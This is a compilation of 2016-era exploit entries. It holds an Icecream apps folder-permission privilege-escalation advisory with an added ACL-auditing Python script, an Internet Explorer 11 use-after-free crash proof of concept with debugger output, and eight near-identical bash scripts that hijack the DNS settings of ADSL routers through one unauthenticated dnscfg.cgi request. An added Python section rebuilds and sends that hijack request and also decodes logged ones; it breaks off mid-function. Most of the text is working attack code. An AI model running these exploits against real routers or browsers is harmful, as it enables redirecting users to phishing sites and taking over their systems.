# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader". Its folder permissions are weak: the ACL grants
Everyone Modify (M) rights on the directory and, because the entry carries the (OI)(CI) inheritance flags, on every file and subfolder beneath it. Any local user can
therefore replace the application's executables or DLLs, and the replacement runs in the security context of any other user who launches the application.
The same vulnerability exists in "Icecream Screen Recorder" and "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Replace any of the application's executables or DLLs with a payload of your choice and wait for another (ideally more privileged) user to launch the application; the payload then runs with that user's rights.
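The weak ACE above is easy to spot by eye in a single listing, but not across a whole Program Files tree. The following Python script is an added example, not part of the original advisory: it parses the text that `icacls "<dir>"` prints, flags any ACE that hands a write-class right (F, M, W, or the equivalent specific rights) to an identity every local user holds, and prints the `icacls /remove:g` command that drops the grant. The sample listing embedded in the script is constructed from the Ebook Reader output shown above; the set of "low-privileged" identities and write rights is the author's choice, not something icacls defines.

```python
import re

# Identities that every interactive local account holds. A write-class grant to one of
# them on a directory under Program Files lets a low-privileged user replace binaries.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls right tokens that allow creating or replacing files (simple and specific forms).
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO", "DC"}
# Tokens that describe inheritance rather than access.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Parse `icacls "<path>"` text output into (principal, inherit_flags, rights) tuples.

    icacls prints the object path on the same line as its first ACE, so the caller passes
    the path it queried and we strip it; the remaining ACEs are one per line.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m is None:  # blank line or the "Successfully processed ..." summary
            continue
        tokens = re.findall(r"\(([^)]*)\)", m["flags"])
        inherit = frozenset(t for t in tokens if t in INHERIT_FLAGS)
        rights = set()
        for t in tokens:
            if t not in INHERIT_FLAGS:
                rights.update(t.split(","))  # specific rights arrive as "(GR,GE)"
        aces.append((m["who"], inherit, frozenset(rights)))
    return aces


def weak_aces(path, output):
    """Return [(principal, sorted write rights, inherits_to_children)] for every ACE
    that grants a write-class right to a low-privileged identity."""
    findings = []
    for who, inherit, rights in parse_icacls(path, output):
        if who.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((who, sorted(rights & WRITE_RIGHTS), bool(inherit & {"OI", "CI"})))
    return findings


def remediation(path, principal):
    """icacls command that removes the offending explicit grant, recursing into subfolders."""
    return f'icacls "{path}" /remove:g "{principal}" /T'


# Constructed sample: the Ebook Reader listing from the advisory, as icacls prints it.
SAMPLE = """\
Icecream Ebook Reader Everyone:(OI)(CI)(M)
                      NT SERVICE\\TrustedInstaller:(I)(F)
                      NT AUTHORITY\\SYSTEM:(I)(F)
                      BUILTIN\\Administrators:(I)(F)
                      BUILTIN\\Users:(I)(RX)
                      BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    target = "Icecream Ebook Reader"
    for who, rights, recursive in weak_aces(target, SAMPLE):
        print(f"{target}: {who} has {','.join(rights)} (recursive={recursive})")
        print("  fix: " + remediation(r"C:\Program Files (x86)\Icecream Ebook Reader", who))
```

To audit a real machine, feed the script the output of `icacls "C:\Program Files (x86)\<app>"` (or loop over `dir /b` of Program Files) and review every finding; Modify for Everyone is the textbook case, but Users or Authenticated Users with W or F on any directory that holds executables is the same bug.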
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)
######################################################################################
0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
############################################################################################
*/
var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;
e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);
e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);
dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;
trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# PLANET VDR-300NU ADSL ROUTER
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# Inteno EG101R1 VoIP Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Inteno EG101R1 VoIP Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
#!/bin/bash
#
# Exper EWM-01 ADSL/MODEM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Exper EWM-01 ADSL MODEM/ROUTER"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" > /dev/null 2>&1
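All eight scripts above send the same single unauthenticated request to `/dnscfg.cgi`; only the banner differs. The Python below is an added example, not code from Todor Donev's scripts: it builds that exact request with the resolver arguments validated as IPv4 literals (the bash versions interpolate `$2`/`$3` unchecked), decodes a captured or logged `dnscfg.cgi` request back into the settings it would apply, and issues the request with `urllib` when run against a target. The User-Agent string and the assumption that the device answers the GET with an HTTP status are the author's; the parameter names and values come from the scripts.

```python
import sys
import ipaddress
import urllib.parse
import urllib.request

DNSCFG_PATH = "/dnscfg.cgi"


def build_dns_change_url(target, primary, secondary=None):
    """Return the unauthenticated dnscfg.cgi request the scripts above send.

    Both resolver arguments are checked as IPv4 literals before they reach the query
    string; ipaddress raises ValueError on anything else.
    """
    ipaddress.IPv4Address(primary)
    if secondary:
        ipaddress.IPv4Address(secondary)
    params = [
        ("dnsPrimary", primary),
        ("dnsSecondary", secondary or ""),  # the originals send an empty value when omitted
        ("dnsDynamic", "0"),                # 0 = use the static resolvers, not the ISP's
        ("dnsRefresh", "1"),                # apply immediately
    ]
    return f"http://{target}{DNSCFG_PATH}?{urllib.parse.urlencode(params)}"


def parse_dns_change(request):
    """Decode a dnscfg.cgi request (a full URL, or a request line such as
    'GET /dnscfg.cgi?... HTTP/1.1' from a proxy log or pcap) into the resolver settings
    it would apply. Returns None for requests that do not touch dnscfg.cgi."""
    url = request
    if url.startswith("GET "):
        url = url.split(" ", 2)[1]
    parts = urllib.parse.urlsplit(url)
    if not parts.path.endswith(DNSCFG_PATH):
        return None
    q = urllib.parse.parse_qs(parts.query, keep_blank_values=True)

    def first(key):
        return q.get(key, [""])[0]

    return {
        "primary": first("dnsPrimary"),
        "secondary": first("dnsSecondary"),
        "static": first("dnsDynamic") == "0",
    }


def send_dns_change(url, timeout=5):
    """Issue the request and return the HTTP status code (assumed: the device answers
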